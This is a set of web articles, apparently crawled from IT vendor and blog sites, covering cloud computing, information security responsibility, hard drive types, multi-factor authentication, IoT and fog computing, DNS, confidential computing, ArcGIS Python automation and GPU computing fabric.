of Cloud Computing Cloud computing is running applications or performing a computational process over the internet. There are numerous benefits companies gain by moving a large portion of their IT solutions to a cloud computing model. Key Benefits Include: - No special hardware requirements. - The ability to access apps and data from just about anywhere on just about any device. - Rolling out upgrades, updates, and patches is fast, simple, and easy since it only needs to be performed on the virtual server, not on every single employee computer and/or device. - Improved Mobility - Improved Scalability Options for Migrating to the Cloud Migrating to the Cloud: Cloud Computing or Cloud Storage? A cloud migration generally refers to both data and processes being moved from on-premises to the cloud, in most business user cases you are talking about both. For example, an Adobe Cloud subscription comes with apps (cloud computing) and file storage (cloud storage). This is an example of Software-as-a-Service model, however there are multiple paths to cloud. Most businesses use some combination of any or all of these types of cloud computing and cloud storage: - Home-grown Networks (VPNs) - Virtual Desktop Hosting - In-House Data Centers - Application Hosting - Cloud Backup & Data Storage Service - Website Hosting - Ecommerce Hosting Cloud Computing Migration Options For most office staff, when we talk about cloud computing, we are talking about adopting solutions so you can do your job from anywhere and save costs. Your options here include Software-as-a-Service, Desktop Virtualization and/or application hosting. A good example of software-as-a-service is Google Docs. Here the app and data all live on Google servers. Compare that to a hosted instance of Microsoft Word. The application is the same as a traditional install on your local hard drive, only it’s installed on an off-site server and it’s accessed remotely. Virtual desktop hosting allows entire user desktops to be stored in a remote server and all you need is an internet connection to connect. Imagine a really long cord stretching from your monitor across stateliness to a remote location where it plugs into your computer. It’s a little more complicated than that, but from a user’s perspective this is how desktop hosting works. When properly implemented it is a seamless experience and highly secure. With virtual desktop hosting you can connect all of your many clouds, from SaaS to application hosting. Cloud Storage Migration Options Public cloud storage is what consumers are most familiar with. This includes Amazon AWS, Microsoft Azure, Google and iCloud. These services are used to store data, house applications for front and back offices, and they store SaaS native solutions. Managed cloud hosting services are when you hire an outside firm to design, maintain and monitor your data and application storage. This is a good option for sensitive business information like financial data or proprietary information. With dedicated hosting, businesses can quickly launch a cloud solution for more mobility and maintain tighter control of their data and systems. In-house data centers can be connected via remote desktop, VPN etc., and this is still common. However, with the amount of data being generated by businesses today, they are rarely the only storage a company has. It’s just too hard to keep up in today’s IT environment, and most businesses need a partner company that is totally focused on cloud architecture . Plus, without offsite backup and storage, your data is in danger of being lost and unretrievable. Where does virtual desktop hosting fit in? Virtual desktop allows you to store and power a user’s entire desktop experience on a remote server. This is a managed cloud hosting service and it is a powerful combination of cloud computing and cloud storage. The benefits of hosting services for virtual desktop often include: - Reduced Server Maintenance & Overhead - Improved Accessibility and Mobility - Tighter Security and Monitoring - Software Maintenance Included - Better Performance Across Devices - Automatic Backups The right virtual desktop hosting solution should be able to deliver almost any application. You should now have a good understanding of the difference between cloud computing and cloud storage. It’s simple: cloud storage=data and cloud computing=processes. One key takeaway from this post is that there really is no weighing options between cloud computing vs cloud storage. They work together and are both critical for keeping pace in today’s rapidly changing tech environment. For most businesses and consumers, cloud usage includes both storage and computing. Are you looking for a simple way to migrate some or all of your Information Systems to the cloud? CyberlinkASP’s desktop hosting can serve up any application.
<urn:uuid:609c879c-bf88-4b2b-aab9-7f720789e6c0>
CC-MAIN-2024-38
https://www.cyberlinkasp.com/insights/difference-cloud-storage-cloud-computing/
2024-09-08T17:05:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00571.warc.gz
en
0.912544
1,451
2.765625
3
20200811Who would you identify as the person who is or should be responsible for Information Security in your organisation? Do they need to be at a senior level? Perhaps an external agency or should a whole department be assigned to look after it? The truth of the matter is that everyone is responsible, from the CEO’s, to the board, to the people operating on the tills and the work-experience student fresh from university. We are all responsible in keeping information secure. Data. Worth more than gold? We all know that an organisation cannot survive and certainly can’t thrive without data. Without data, there is no information, without information, there is no knowledge, without knowledge, there is no wisdom. Organisations of all sizes need data. A window cleaner who has a simple ‘black book’ of addresses, with amounts of money owed is carrying data. If that black book was lost, stolen or destroyed, the impact on their business could be significant. Data is the foundation upon which all organisations are built. Think about it this way; Google is worth billions but what is its core asset? Data. How about Facebook? The same answer. Data is not just valuable, it’s worth more than gold and oil. Protecting your assets. The protection of data and the security of information can’t be handed to one person or department in an organisation because everyone has an impact on the ability to keep it safe. For example, expecting your IT department to be solely responsible for it is like expecting your finance team to be responsible for saving money but then allowing everyone else to do as they please, ignoring income and expenditure! Everyone in your organisation collects, processes and shares data and information, therefore, how they protect it is of key importance to everyone. A good way to illustrate and highlight this is to conduct a data audit so that you can unearth where your valuable assets are. You’ll probably have already carried out something like this when the General Data Protection Regulation (GDPR) came into force but it’s worth revisiting at least annually. Ask the heads of each function to identify; - Key processes they have - Each system they use to help in the processes identified - What information they hold (customers, employee details, financial etc) - What data they hold (name, DoB, address, national insurance numbers, email etc) - How much information they hold (10,000 records? 100 records?) The above will help to build a picture of the data assets you hold so you can make some decisions about how you protect them. Everyone is responsible, only one is accountable It doesn’t matter if your organisation employs five, five hundred or five thousand; Everyone has a part to play in protecting Data and ensuring Information Security. From the receptionist on the front desk, who has knowledge (based on data) that the CEO is flying to the USA at 1pm, to the CEO who is flying to the USA to discuss the latest acquisition. Everyone is responsible, in a large or small way for ensuring data doesn’t fall into the wrong hands, or is accidentally (or deliberately) lost or stolen. Each person in an organisation processes data in a variety of ways and under increasing pressure to process more and more, faster and faster. It’s vitally important that we all understand that we can have a positive or negative impact on our organisations, in the way we process and protect data. But if we are all responsible for Information Security, who is accountable? Is it the person hired to ensure there is a programme in place to protect data? The answer is, no. Even the person hired to help in this regard is not truly accountable for Information Security. In the GDPR, there is an over-riding 7th principle known as the principle of accountability, which means that the Data Controller must be able to evidence that appropriate and technical measures are in place to protect data. Just as in Health and Safety, if there is a break-down in the ability to protect individuals, then someone must be held accountable. Accountability, therefore, rests with the head of the organisation; The business owner or the CEO. This is no different for Information Security. Health and Safety for Data For far too long organisations have employed an Information Security Manager and said “It’s your job. Make us secure!” Although of course, it’s their role to lead and guide you on your journey to become more secure, they can’t do it alone. It’s a little like hiring a Health and Safety officer and asking them to ensure you don’t have accidents but then allowing people to run around in blindfolds, with scissors!? Everyone understands the relevance of Health and Safety, although we may sigh at some of the things we need to comply with, most people recognise the importance of it because, perhaps, we have seen first hand the impact of NOT doing it right. Information Security is no-less important but the impact of getting it wrong is often not fully understood or realised. This is because the impact is rarely discussed for fear of ‘scaremongering’. As professionals who are the project leads, or guides on this journey, we need to stop being so squeamish. We need to explain why having weak passwords is a bad thing. We need to explain what the impact is if we click on an infected link in an email. Without context, people won’t know why they need to follow our guidance. Just because people are aware that having weak passwords is a bad thing, it doesn’t mean they care. We need to emphasise that it is their responsibility to follow good practice in protecting data and ensuring Information Security. Everyone is responsible for Information Security. It can’t be done in isolation, or have one person named as responsible. We’re in this together and if each one of us was a little more aware of the positive impact our behaviour can have on the security of our organisations, then people might just start taking notice. Information Security, like Health and Safety, is everyone’s responsibility. Security is no accident; it’s a choice each of us makes every day.
<urn:uuid:d8464e66-884c-451f-b184-fb5969628af2>
CC-MAIN-2024-38
https://cyberfortgroup.com/blog/who-is-responsible-for-information-security/
2024-09-11T03:09:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00371.warc.gz
en
0.951936
1,304
2.796875
3
So with all of the new technologies coming out today it is easy to lose track. We’re here to help and in this post I will go over the most common styles of storage and hard drives that can be placed in a computer. - Starting with the oldie but goodie, we have the classic Hard Disk Drive, which is also known as a HDD. These drives have been around for so long that the technology is almost as good as it is going to be. The only thing that is being improved upon now is space efficiency. Because of their ease of development HDD is going to be your cheapest storage option. With a 1TB (1000GB) drive costing usually less than $100 depending on your vendor. HDDs come in usually two speeds: 5,400RPM and 7,200RPM. There are 10,000RPM or higher drive speed but these speeds are normally reserved for servers, and not for commercial users. These drives tend to last around 5 – 8 years depending on usage. They are the bread and butter of the hard drives and will be around for many more years to come. - Next we have the new kid on the block: the Solid State Drive, or SSD. These drives have been around for quite some time. However, they have only really become affordable in the more recent years. These drive are the Lamborghini’s of the storage media. Extremely fast but not as much trunk space as their more affordable cousins, the HDD. The SSD has slowly been coming down in price making it more common to see in new systems. More commonly you will find them in laptop systems where heat management and speed are more of a concern. These drives make booting up your system amazingly fast. A typical system booting Windows 10 from an SSD will boot from power button press to the login screen in roughly 5 to 8 seconds. Comparing this to a standard 7,200RPM HDD, you are looking at anywhere between 2 minutes to 5 minutes depending on the version of your Operating system. So if you are looking for a high performance drive, and not too concerned about the storage space look no further than a SSD for your next system. - The final drive type we will be talking about are the Solid State Hybrid Drives, or SSHDs. These drives, just as the name suggests are a mix of Hard Drives and SSDs. With SSHDs you sacrifice a little bit of the SSDs speed for a massive amount of storage of the HDD, for about 25 – 50% the cost of a similar size SSD. How SSHDs work is they “learn” what files are used most and places them in the SSD portion of the SSHD. This allows those files to load much faster. These files typically tend to be your OS files and maybe one or two programs that you use the most. These drives are typically used for those wanting to upgrade their systems but just do not have the budget for a SSD that meets their storage needs. Hopefully this clears up a little of the mysteries related to hard drives. If you are looking to upgrade your system or your system just is not moving along like it used to, do not hesitate to give us a call and we will get you taken care of. We are your Austin Area Computer Repair and IT Service & support company. Frankenstein Computers has been taking care of our happy clients since 1999. We specialize in affordable IT Support, Cybersecurity Services, IT Services, IT Security, Office 365, Cloud, VOIP Services, SPAM, Wireless, Network Monitoring Services, Custom Gaming PC, MAC repair, PC Repair In Austin, Virus Removal, remote support, web design, on site support and much more. See what our clients have to say about us on Yelp!
<urn:uuid:e4e1f9b5-0e9b-474b-8082-42c0c03e0d2c>
CC-MAIN-2024-38
https://www.fcnaustin.com/hard-drive-breakdown/
2024-09-11T03:55:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00371.warc.gz
en
0.964319
771
2.546875
3
Securing your account is more important than ever. But don't take our word for it. Just look at the fact that data breaches rose by a shocking 68% last year. A secure account is one that makes use of the right types of authentication. In this day and age, a password alone is not enough. You need multi-factor authentication (MFA). Multi-factor authentication makes it far more difficult for a bad actor to compromise an account. With how much a security breach can cost, it's a small measure to avoid digital catastrophe. But not all MFA is equal. For National Cybersecurity Month, we're going back to our roots and discussing cybersecurity basics. In this episode of cybersecurity 101, we're covering multi-factor authentication. Keep reading for everything you need to know. National Cybersecurity Month Basics: What Is Multi-Factor Authentication (MFA)? Multi-factor authentication (MFA) is an extra layer of security included during the login process. If you've spent any time online, there's a good chance you've heard of two-factor authentication (2FA). There's little difference between these two terms. 2FA requires two forms of authentication, while MFA can require 2 or more. The Problem With Passwords A password is usually the first form of authentication. However, passwords are flawed by design. They're a static string of information that anyone can steal and use. Passwords are often short, making them susceptible to a brute-force attack. A standard desktop computer could crack a 9-character password in as little as 2 hours. The time to crack a password is even shorter when the password includes words or phrases. Further, employees often fall victim to phishing emails. Despite the best efforts of an IT team, a convincing email could sway an employee to divulge credentials. It only takes the login info of one unwitting employee to compromise your network. Further, the storage methods for passwords are not all equal. Some websites commit the digital faux pas of storing passwords in plain text. That, or they do not use the proper encryption methods. It's not enough to expect companies to use the best security practices. Until zero-trust security becomes the norm, password-only authentication is a liability for the integrity of your network. MFA serves as a solution to all this. It introduces another hurdle in the login process, a hurdle that will dissuade all but the most tenacious hackers. For high-security accounts, you can force employees to use more authentication methods. Benefits of Multi-Factor Authentication The benefit is clear: even if a hacker obtains your password, they won't be able to gain access to your account. Regardless, you should do everything in your power to have a strong password. MFA comes in many shapes and forms. There are digital multi-factor authentication methods and physical ones. Some are less secure than others. Some are more convenient, but come with important caveats. That means you can choose whichever authentication method works best for your organization. Those with a higher threat level can choose a more sophisticated MFA if necessary. MFA doesn't require much work on your behalf, either. It adds a few seconds at best to the login process. In turn, you increase your security tenfold. Let's discuss the many different types of MFA, their advantages, and their respective weaknesses. No matter which method of MFA you choose, it's better than having no MFA at all. 1. One-Time Password (OTP) A one-time password, as the name implies, is a limited-time password that expires after a single use. You use a different OTP for subsequent logins. In some cases, an organization may require an OTP for every login, even on a recognized device. Support for OTP is growing for many companies. However, it's less common than competing options like SMS and email authentication. Despite this lack of popularity, OTP is among the strongest authentication methods on this list. The most common form of OTP comes in the form of an authenticator app. Google Authenticator is perhaps the most popular authenticator app on the market. However, there are many other options, including open-source options for privacy enthusiasts. How to Use OTP OTP requires downloading an authenticator app first. You'll need to navigate to your account settings and locate the option to enable MFA or 2FA. Your account provider should then generate a QR code. After you scan this code, your authenticator app will start producing codes. the provider may ask for you to enter the code that appears. Authenticator apps generate a new 6-digit code every 30 seconds. You need to enter this code before the 30-second timer runs out. Advantages and Disadvantages of OTP OTP is a very strong method of authentication. This is because it presents a considerable impediment to bad actors. In order to obtain your OTP codes, they would need to steal and compromise your mobile device. The authenticator app itself can be behind several walls of security itself. There may be biometrics or a pin code to unlock the phone. Many OPT apps require a biometric or pin code unlock to access them, too. That said, OTP is a bit more involved. You have to type the code in fast, and if you miss the 30-second window, you have to wait to try again. OTP also requires that you keep your cell phone on hand any time you need to log in. There is also a risk, however, slight, that someone steals your mobile device. Even biometrics are not impervious to hacking. Depending on the implementation, a hacker could access your device with ease. 2. A Proprietary Authenticator App An authenticator app for a specific company is one of the most secure types of cybersecurity authentication. A perfect example of this is the Microsoft Authenticator app. Companies store sensitive documents in Office 365, so using their proprietary authenticator keeps those documents safe. How to Use Proprietary Authenticator Apps Using Microsoft Authenticator as an example, these apps provide a number of possible ways to access your account. For starters, they can simply send an "approve/deny" notification to your phone anytime someone attempts to log in. Or, they can provide a unique OTP that you enter in place of your normal password. A proprietary authenticator app may also require biometrics to authenticate a login. Advantages and Disadvantages of a Proprietary Authenticator App As far as digital authentication methods go, this is perhaps the strongest. Rather than just having an OTP code, the authenticator requires full account access in the first place. The same disadvantages apply as OTP apply here. If you don't have your mobile device on hand, you cannot log in. If someone steals your mobile device, there is a small risk they could hack it and access all your accounts. 3. Email and SMS These are the most common forms of MFA and 2FA. When you log in, the provider sends an email or text message with a login code. You need to provide this code within the following minutes to gain access. These are the easiest forms of MFA to use. You just need to wait for the message to arrive. Advantages and Disadvantages of Email and SMS As we've mentioned earlier, any form of MFA is better than none at all. Email and SMS are convenient, requiring minimal effort on the user's part. However, this is the least secure method of MFA, particularly for SMS messages. Hackers have long since been able to spoof your phone number and receive your text messages. Email might be a bit stronger, but hackers can still compromise email accounts. You should prioritize email over SMS--assuming your email has a strong password and MFA itself. For optimal cyber safety, we advise that you avoid SMS at all costs. Related Reading: Introduction to Email Security | 4. Biometrics: Facial Identification, Fingerprint, and Voice Facial identification has caught on as the easiest method of biometrics. As long as the camera has a clear view of the user with good lighting, verification is almost instant. While the strongest implementations like Apple's Face ID are not impervious, they are difficult to hack. Facial identification works great for mobile devices, but it's less common on desktop computers. This is because it requires a dedicated IR-enabled camera with depth sensors. Windows Hello, while a solid desktop face unlock solution, is not compatible with the majority of webcams. Fingerprint reading can be just as fast as facial identification. This tends to be a more mobile-oriented option, though. Many enterprise-grade laptops do feature a fingerprint reader, but it's less common. Voice recognition is the least common of all biometric unlock options. AI makes it easy to clone a voice and make it say whatever you want--including an unlock phrase. Advantages and Disadvantages of Biometrics Biometrics are often the easiest form of authentication. You have access to biometrics at all times. There's no need to carry around a secondary device. They're also more convenient that OTP or SMS codes. They're perfect for an organization where employees use mobile devices as their main source of MFA. On the whole, biometrics tend to be more difficult to hack. While it's not impossible to crack them, they often require bad actors to steal your device. The hacker would then need to use sophisticated methods to trick your device. The exponential improvements with AI will make biometrics weaker in the coming years. Deepfakes, fingerprint copies, and cloned voices all pose a threat to this method. However, AI will likely help to identify these false attempts as well. 5. Physical Device Authentication: A FIDO Security Key, RFID Keycard, or NFC-Enabled Device A physical device is the gold standard for MFA cybersecurity. This usually comes in the form of a Yubico USB security key, RFID card, or NFC-enabled mobile device. It's very difficult for a hacker to compromise a physical key, compared to the above options. Security keys are relatively easy to use. When prompted, you insert or tap the key. Authentication is near instant. Advantages and Disadvantages of Physical Device Authentication Physical devices are a very strong form of MFA. However, they do come with what could be considered a massive flaw for some. If someone steals your key, they might gain access to your account. FIDO is notoriously difficult to clone, even if someone does steal it. Assuming you have a strong password, a hacker won't be able to access your account. Provided you take good care of your FIDO key to prevent theft, it's a strong security option. In the case of RFID, someone only needs to get close to you to clone an RFID badge. With NFC, these risks are mitigated to an extent. If a hacker succeeded in unlocking your device, then you run into the same issue as with authenticator apps. Like with authenticator apps, you need this physical device whenever you wish to log in. If you lose it, that could make it very difficult to regain access to your account. Physical keys are great since they are very difficult to spoof without stealing them. If you implement physical keys in your organization, you need to be sure employees will treat them with great care. Attaching them to a keyring that you leave out on your desk, for example, is poor security conduct. Improve Your Organization's Security Posture For National Cybersecurity Month, we invite you to strengthen your employees' credentials with multi-factor authentication. It provides a needed layer of security so you don't rely on passwords alone. There are many different types of authentication to choose from, giving you cybersecurity options for any use case. Stronger passwords and MFA are just the beginning. Your organization can benefit from a complete, all-inclusive security solution. That security solution is XDR (extended detection and response). Check out BitLyft today for the next-gen XDR that will secure your network from top to bottom.
<urn:uuid:0de66a1b-2b30-4200-bdca-9f588569ce9c>
CC-MAIN-2024-38
https://www.bitlyft.com/resources/cybersecurity-101-how-to-use-multi-factor-authentication
2024-09-17T05:58:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651739.72/warc/CC-MAIN-20240917040428-20240917070428-00771.warc.gz
en
0.942421
2,552
3.03125
3
The oft used term “the Internet of Things” (IoT) has expanded to encapsulate practically any device (or “thing”) with some modicum of compute power that in turn can connect to another device that may or may not be connected to the Internet. The range of products and technologies falling in to the IoT bucket is immensely broad—ranging from household refrigerators that can order and restock goods via Amazon, through to Smart City traffic flow sensors that feed navigation systems to avoid jams, and even implanted heart monitors that can send emergency updates via the patient’s smartphone to a cardiovascular surgeon on vacation in the Maldives. The information security community—in fact, the InfoSec industry at large—has struggled and mostly failed to secure the “IoT”. This does not bode well for the next evolutionary advancement of networked compute technology. Today’s IoT security problems are caused and compounded by some pretty hefty design limitations—ranging from power consumption, physical size and shock resistance, environmental exposure, cost-per-unit, and the manufacturers overall security knowledge and development capability. The next evolutionary step is already underway—and exposes a different kind of threat and attack surface to IoT. As each device we use or the components we incorporate in to our products or services become smart, there is a growing need for a “brain of brains”. In most technology use cases, it makes no sense to have every smart device independently connecting to the Internet and expecting a cloud-based system to make sense of it all and to control. It’s simply not practical for every device to use the cloud the way smartphones do—sending everything to the cloud to be processed, having their data stored in the cloud, and having the cloud return the processed results back to the phone. Consider the coming generation of automobiles. Every motor, servo, switch, and meter within the vehicle will be independently smart—monitoring the devices performance, configuration, optimal tuning, and fault status. A self-driving car needs to instantaneously process this huge volume of data from several hundred devices. Passing it to the cloud and back again just isn’t viable. Instead the vehicle needs to handle its own processing and storage capabilities—independent of the cloud—yet still be interconnected. The concepts behind this shift in computing power and intelligence are increasingly referred to as “Fog Computing”. In essence, computing nodes closest to the collective of smart devices within a product (e.g. a self-driving car) or environment (e.g. a product assembly line) must be able to handle he high volumes of data and velocity of data generation, and provide services that standardize, correlate, reduce, and control the data elements that will be passed to the cloud. These smart(er) aggregation points are in turn referred to as “Fog Nodes”. Source: Cisco / Click to Enlarge Evolutionary, this means that computing power is shifting to the edges of the network. Centralization of computing resources and processing within the Cloud revolutionized the Information Technology industry. “Edge Computing” is the next advancement—and it’s already underway. If the InfoSec industry has been so unsuccessful in securing the IoT, what is the probability it will be more successful with Fog Computing and eventually Edge Computing paradigms? My expectation is that securing Fog and Edge computing environments will actual be simpler, and many of the problems with IoT will likely be overcome as the insecure devices themselves become subsumed in the Fog. A limitation of securing the IoT has been the processing power of the embedded computing system within the device. As these devices begin to report in and communicate through aggregation nodes, I anticipate those nodes to have substantially more computing power and will be capable of performing securing and validating the communications of all the dumb-smart devices. As computing power shifts to the edge of the network, so too will security. Over the years corporate computing needs have shifted from centralized mainframes, to distributed workstations, to centralized and public cloud, and next into decentralized Edge Computing. Security technologies and threat analytics have followed a parallel path. While the InfoSec industry has failed to secure the millions upon millions of IoT devices already deployed, the cure likely lies in the more powerful Fog Nodes and smart edges of the network that do have the compute power necessary to analyze threats and mitigate them. That all said, Edge Computing also means that there will be an entirely new class of device isolated and exposed to attack. These edge devices will not only have to protect the less-smart devices they proxy control for, but will have to be able to protect themselves too. Nobody ever said the life of an InfoSec professional was dull.
<urn:uuid:57e50824-764d-49e0-a5d7-a9c97956e51e>
CC-MAIN-2024-38
https://circleid.com/posts/20161227_edge_computing_fog_computing_iot_and_securing_them_all/
2024-09-18T12:25:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00671.warc.gz
en
0.933072
981
2.75
3
What is DNS and How Does it Work? DNS, which stands for Domain Name System, is a crucial component of the internet infrastructure that facilitates human-friendly web addresses (domain names) to be translated into machine-readable IP addresses. It acts as a distributed database that helps computers and network devices locate and connect with each other over the Internet. Here's how DNS works Domain Names: Every device connected to the Internet, such as web servers, computers, or other networked devices, has an IP address, which is a numeric identifier. However, remembering IP addresses for every website or service is impractical for humans. That's where domain names come in. Domain names are human-readable addresses associated with specific IP addresses. Domain Name Hierarchy: The domain name system is organized in a hierarchical structure. The hierarchy consists of different levels, separated by dots. The highest level is the root domain, followed by top-level domains (TLDs), second-level domains, and so on. For example, in the domain "www.example.com," ".com" is the TLD, "example" is the second-level domain, and "www" is a subdomain. DNS Resolvers: When you type a domain name into your web browser (e.g., www.example.com), your computer needs to obtain the corresponding IP address. It starts by contacting a DNS resolver, typically provided by your Internet Service Provider (ISP) or configured manually. The DNS resolver is responsible for finding the IP address associated with the requested domain. DNS Query: If the DNS resolver doesn't have the IP address in its cache (a temporary storage of previously resolved domain names), it initiates a DNS query. The query is sent to the root DNS servers, which provide information about the TLD servers. TLD Servers: The TLD servers direct the query to the authoritative name servers responsible for the specific TLD. For example, if the TLD is ".com," the query is directed to the authoritative name servers for the ".com" TLD. Authoritative Name Servers: The authoritative name servers are responsible for storing and providing information about domain names within a specific domain. They return the IP address associated with the requested domain name. Caching: Once the DNS resolver receives the IP address, it stores the information in its cache for a certain period (Time-to-Live or TTL). This caching mechanism helps improve the efficiency of future DNS queries by avoiding the need to repeatedly query authoritative name servers for frequently accessed domain names. Response to Client: The DNS resolver returns the IP address to the client device (e.g., your computer), which can then use this information to connect to the desired server. In summary, DNS serves as a critical translation service, converting human-readable domain names into machine-readable IP addresses. This systematic and hierarchical process enables efficient and scalable navigation on the internet by simplifying the way we access websites and services. About this post Viewed: 1,846 times No comments have been added for this post. Sorry. Comments are frozen for this article. If you have a question or comment that relates to this article, please post it in the appropriate forum.
<urn:uuid:cfc45d54-2979-4234-a6fc-8e89f46ae432>
CC-MAIN-2024-38
https://www.fortypoundhead.com/showcontent.asp?artid=1164
2024-09-18T11:26:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00671.warc.gz
en
0.911302
671
4.15625
4
Transferring data across shared environments comes with an element of risk , as the organization can lose some control over how that data is managed and protected . Think about threat actors that exploit a vulnerability in an application which gives them kernel access to the underlying operating system . From there , they can perform screen scrapes , memory dumps and more , because the operating system is controlling how the data is processed in memory . By contrast , a confidential computing approach essentially keeps data secure the whole time it is undergoing analysis or computation . The trusted execution environment serves as a gateway between any data that ’ s being used in memory and any code that requests to access that data , whether it ’ s an operating system or application . Even if attackers could execute a memory dump , the data that they would be able to access in memory would come out encrypted . We ’ re regularly seeing more hardware and firmware vulnerabilities come to light . I believe that is in large part due to the industry getting better at dealing with software vulnerabilities . In many cases , however , hardware vulnerabilities are currently the soft underbelly of cloud technologies . For that reason , I expect to see increasing numbers of adversaries trying to exploit the weaknesses of hardware and firmware to gain access to data in use . As businesses become increasingly aware of this risk , I expect confidential computing to rapidly grow in popularity . Financial services will likely start rolling it out first , since heavy regulations usually mean financial institutions lead other industry sectors when it comes to any type of data security . I expect other industries will follow suit fairly quickly . Healthcare and insurance organizations will probably be a close follower after the big banks , as will critical infrastructure organizations , such as defense firms and power companies , because they are often in the crosshairs of adversaries trying to steal or manipulate data . While awareness of the issue is just now starting to emerge , confidential computing is a technology that every business should be aware of . In the near future , every organization that processes critical data in the cloud should be evaluating whether its cloud providers are using confidential computing to secure data in use . p 46 INTELLIGENTCIO APAC www . intelligentcio . com
<urn:uuid:b72b88a4-e528-4c82-9b35-f5b095e43391>
CC-MAIN-2024-38
https://apac.magazine.intelligentcio.com/intelligent-cio-apac-issue-34/0661506001683129582/p46
2024-09-11T05:35:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00471.warc.gz
en
0.94488
438
2.578125
3
The Importance of Automation in Mapping A geographic information system (GIS) can be used to display spatial data, as well as to analyze and manipulate that data to solve problems. ESRI’s ArcGIS software and Python can be used to solve geographic problems. Python is a free, open-source programming language used to create scripts used in conjunction with ArcGIS. Read What is Python? for additional information. It is assumed that you have some background and understanding in basic geoprocessing, GIS operations used to manipulate spatial data including buffering, clipping, and merging data sets. Read What is geoprocessing? to review how geoprocessing tools such as Project and Clip can be used to sequence tools to automate work and solve problems. Perhaps you need to classify certain soil types along a river in a community to provide inputs for a model. You may not need all the detailed types available, so you merge similar types based on the attribute, buffer the river and clip it with both the community polygon and river buffer. It makes sense to do this manually for a single dataset, but if this needs to be run multiple times in many different areas, the process could be automated in several different ways to make the process easier, less prone to error, and faster. It does take extra time to set up the automated process, test it to make certain that it gives the correct results, and solve problems that may show up when running a process on a wide variety of inputs. This does present a trade-off which needs to be weighed when deciding whether to automate a process. Once you are familiar with automating tasks, it may be worthwhile to automate the process even if it will only be done two or three times. There are several ways to automate a tool for multiple inputs in ArcGIS: - Create a batch process by right-clicking on a tool and choosing batch process. This works well when only a single tool needs to be run on many different inputs. The output of one tool is used as the input to the second tool. - Use ModelBuilder to create a sequence of tools. - Run Python scripts to run a tool automatically or as part of a sequence of tools. - Write a program in ArcObjects directly, that uses the same building blocks employed by ESRI developers. The Essential Python Vocabulary describes the terminology used to understand geoprocessing with Python. The ArcGIS Console is a good place to start learning some python for GIS. It runs each line of code as it is entered providing immediate feedback and helps on python commands specific to GIS. Select the Python icon shown in Figure 1 or select Geoprocessing > Python from the menu bar to open the Python Window in ArcGIS. Figure 1: ArcGIS Menubar The command prompt is shown below in Figure 2. Figure 2: ArcGIS Console A great feature of the console is that you can type a variable name and it will display the current value immediately on the next line before it again shows the prompt (>>>).
<urn:uuid:8c3f094b-f02b-44f4-b428-abbd970706db>
CC-MAIN-2024-38
https://electricala2z.com/python-programming/automation-in-mapping/
2024-09-11T06:06:48Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00471.warc.gz
en
0.916781
638
3.53125
4
It’s known that training large models is done on clusters of machines with preferably many GPUs per server.This article will introduce the professional terminology and common network architecture of GPU computing. Exploring Key Components in GPU Computing PCIe Switch Chip In the domain of high-performance GPU computing, vital elements such as CPUs, memory modules, NVMe storage, GPUs, and network cards establish fluid connections via the PCIe (Peripheral Component Interconnect Express) bus or specialized PCIe switch chips. NVLink is a wire-based serial multi-lane near-range communications link developed by Nvidia. Unlike PCI Express, a device can consist of muıltiple NVLinks, and devices use mesh networking to communicate instead of a central hub. The protocol was first announced in March 2014 and uses proprietary high-speed signaling interconnect (NVHS).The technology supports full mesh interconnection between GPUs on the same node. And the development from NVLink 1.0, NVLink 2.0, NVLink 3.0 to NVLink 4.0 has significantly enhanced the two-way bandwidth and improved the performance of GPU computing applications. NVSwitch is a switching chip developed by NVIDIA, designed specifically for high-performance computing and artificial intelligence applications. Its primary function is to provide high-speed, low-latency communication between multiple GPUs within the same host. Unlike the NVSwitch, which is integrated into GPU modules within a single host, the NVLink Switch serves as a standalone switch specifically engineered for linking GPUs in a distributed computing environment. Several GPU manufacturers have taken innovative ways to address the speed bottleneck by stacking multiple DDR chips to form so-called high-bandwidth memory (HBM) and integrating them with the GPU. This design removes the need for each GPU to traverse the PCIe switch chip when engaging its dedicated memory. As a result, this strategy significantly increases data transfer speeds, potentially achieving significant orders of magnitude improvements. In large-scale GPU computing training, performance is directly tied to data transfer speeds, involving pathways such as PCIe, memory, NVLink, HBM, and network bandwidth. Different bandwidth units are used to measure these data rates. Storage Network Card The storage network card in GPU architecture connects to the CPU via PCIe, enabling communication with distributed storage systems. It plays a crucial role in efficient data reading and writing for deep learning model training. Additionally, the storage network card handles node management tasks, including SSH (Secure Shell) remote login, system performance monitoring, and collecting related data. These tasks help monitor and maintain the running status of the GPU cluster. For the above in-depth exploration of various professional terms, you can refer to this article Unveiling the Foundations of GPU Computing-1 from FS community. High-Performance GPU Fabric In a full mesh network topology, each node is connected directly to all the other nodes. Usually, 8 GPUs are connected in a full-mesh configuration through six NVSwitch chips, also referred to as NVSwitch fabric.This fabric optimizes data transfer with a bidirectional bandwidth, providing efficient communication between GPUs and supporting parallel computing tasks. The bandwidth per line depends on the NVLink technology utilized, such as NVLink3, enhancing the overall performance in large-scale GPU clusters. IDC GPU Fabric The fabric mainly includes computing network and storage network. The computing network is mainly used to connect GPU nodes and support the collaboration of parallel computing tasks. This involves transferring data between multiple GPUs, sharing calculation results, and coordinating the execution of massively parallel computing tasks. The storage network mainly connects GPU nodes and storage systems to support large-scale data read and write operations. This includes loading data from the storage system into GPU memory and writing calculation results back to the storage system. Want to know more about CPU fabric? Please check this article Unveiling the Foundations of GPU Computing-2 from FS community.
<urn:uuid:03819bc7-4c5e-4cdd-81f2-be117b270b5a>
CC-MAIN-2024-38
https://www.fiber-optic-solutions.com/mastering-the-basics-of-gpu-computing.html
2024-09-13T18:09:48Z
